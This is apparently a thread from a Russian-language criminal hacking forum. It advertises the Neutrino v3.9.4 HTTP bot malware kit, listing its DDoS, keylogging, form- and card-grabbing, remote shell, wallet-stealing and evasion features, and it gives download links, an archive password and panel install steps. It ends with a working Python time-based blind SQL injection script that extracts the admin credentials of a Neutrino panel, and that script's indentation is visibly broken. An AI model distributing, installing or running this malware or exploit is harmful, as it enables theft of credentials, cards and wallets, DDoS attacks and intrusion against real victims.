• XSS.stack #1 – первый литературный журнал от юзеров форума

Neutrino v3.9.4 HTTP Bot

DarckSol

(L1) cache
Пользователь
Регистрация
17.03.2008
Сообщения
894
Реакции
182
Builder
024318e73f70abc91b0402c7d35677e3.png

Admin Panel

Task Manager

ae57e3fb8b0222420302306d91b1c964.png


Statistic

de1e7334dd2106960b153fb04410465b.png


9c2c495ddfa229ce65ae182fa3e57933.png


FormGrabber

382a9ad391e4f502890a84e427ee1635.png


CC Grabber

92dc1da9c356a6fb9958be63070c2437.png
DDOS_

* HTTP (S) flood (methods GET \ POST)
* AntiDDOS flood (Emulation js \ cookies)

* SmartDDoS
* Slowloris flood
* Download flooding
* TCP flood
* UDP flood

----------------------------------------------------------------------------

* Loader (exe, dll, vbs, bat ... + possibility to specify the parameters for the start of the file)
* Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window)
* Command shell (remote command execution via shell windows)
* Stealing files by mask (eg bitcoin wallets)
* Launch the browser with one of these links (aka Cheaters views)
* Substitution Hosts
* Stilling Win Key
* Reproduction (USB \ Archive)
* Purity downloads (amount found "neighbors" on the computer)
* Identifying the installed AV (on all Windows except Server)
* Update
* Work through the gasket
* FTP Sniffer
Additional functions

* Anti debugging
* AntiVM
* Detect sandboxes
* Detect all online services, automatic analysis
* BotKiller

* Bot protection (protection process \ files \ registry branches)
* Unlimited number of simultaneous commands (Some commands have a higher priority in relation to others and their performance stops, etc.)
* Unlimited number of backup domain
* Quiet operation even under a limited user account
* Do not load the CPU

Functional admin
* A flexible system of creating jobs
* Detailed statistics on bots
* Ability to issue commands to each country individually or bot
* Customizable bots otstuk
* Sort bots in the articles on IP \ line \ Countries \ OS
* The system bans.

----------------------------------------------------------------------------

- Weight uncompressed binaries ~ 50kb (PL - C)
- Boat tested on the entire line of Windows, starting with XP to 8.1 (x32 / 64)

----------------------------------------------------------------------------

:zns5: Скачать|Download

:zns5: Скачать|Download

Passwd:dlab.org.,e
 
When unrar it said the file stub has an error, did you knew that?? How to fix this?

Write to me in ICQ/Jabber , 'll try to help You

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

Ребят, кто поможет поставить, никак не могу обрамить данное добро через ISP-панель
Не смешно же...
1) Открыть файловый менеджер
2) залить админку на хост (распоковать, если архивом заливалось)
3) Назначить на config.php и папку log права 777
4) перейти в браузере по ссылке domain/panel/install.php и следовать инструкциям...
Ведь не сложно же....

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

Neutrino Bot Exploit (SqlInj)

Phyton Script

Код:
import requests
import time
import sys
 
wait_delay = 1
 

def brute_length(url, field):

	for i in range(0, 30):
  Injection = "/tasks.php?ip=1', (IF(LENGTH((SELECT %s FROM users WHERE uid='1')) = %d, SLEEP(%d), 0)), '1', '1', '1', '1', '1','1','1');-- -&cn=1&uid=1&os=1&av=1&nat=1&version=1&phone=1&serial=1&quality=1&getcmd=1" % (field, i, wait_delay)
  ConnectUrl  = url + Injection

  start = time.time() 
  r = requests.get(ConnectUrl)
  end = time.time()

  if((end - start) >= wait_delay):
  	return i
  	
	return 0
	
def brute_char(url, field, position):

	sys.stdout.write(" ")
	sys.stdout.flush()
  	
	for i in range(32, 127):
  Injection = "/tasks.php?ip=1', (IF(SUBSTRING((SELECT %s FROM users WHERE uid='1'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), '1', '1', '1', '1', '1','1','1');-- -&cn=1&uid=1&os=1&av=1&nat=1&version=1&phone=1&serial=1&quality=1&getcmd=1" % (field, position, i, wait_delay)
  ConnectUrl = url + Injection
  
  sys.stdout.write("\b%c" % chr(i))
  sys.stdout.flush()
  
  start = time.time() 
  r = requests.get(ConnectUrl)
  end = time.time()

  if((end - start) >= wait_delay):
  	break

def brute_panel(url):
	
	print("Username: ", end="",flush=True);
	ulen = brute_length(url, "username");
	
	for i in range(1, ulen+1):
  brute_char(url, "username", i)

	print("\nPassword: ", end="",flush=True);
	plen = brute_length(url, "password");
	
	for i in range(1, plen+1):
  brute_char(url, "password", i)
	

if(len(sys.argv) >= 2):
	brute_panel(sys.argv[1])
else:
	print("usage: neutrino.py http://panelurl.com/")
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх